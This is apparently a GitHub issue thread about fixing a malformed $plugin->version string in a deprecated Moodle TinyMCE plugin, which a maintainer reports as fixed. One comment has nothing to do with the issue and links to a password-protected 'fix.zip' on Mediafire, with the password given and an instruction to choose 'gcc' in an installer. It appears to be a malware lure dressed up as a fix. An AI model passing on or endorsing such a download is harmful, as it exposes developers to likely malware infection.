### ISSUE TITLE
Fix: $plugin->version has a wrong format

### ISSUE THREAD

**Issue by danowar2k** [streamingltd/MEDIAL-Moodle-TinyMCE#2]
I know the plugin is deprecated, but please integrate this basic fix to have a "valid" version.php again:

https://github.com/streamingltd/MEDIAL-Moodle-TinyMCE/pull/1

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by danowar2k** [comment]
Oh we already fixed the issue locally, it's just nicer to have the fix in github, too.

**Comment by tim1mw** [comment]
Now fixed.
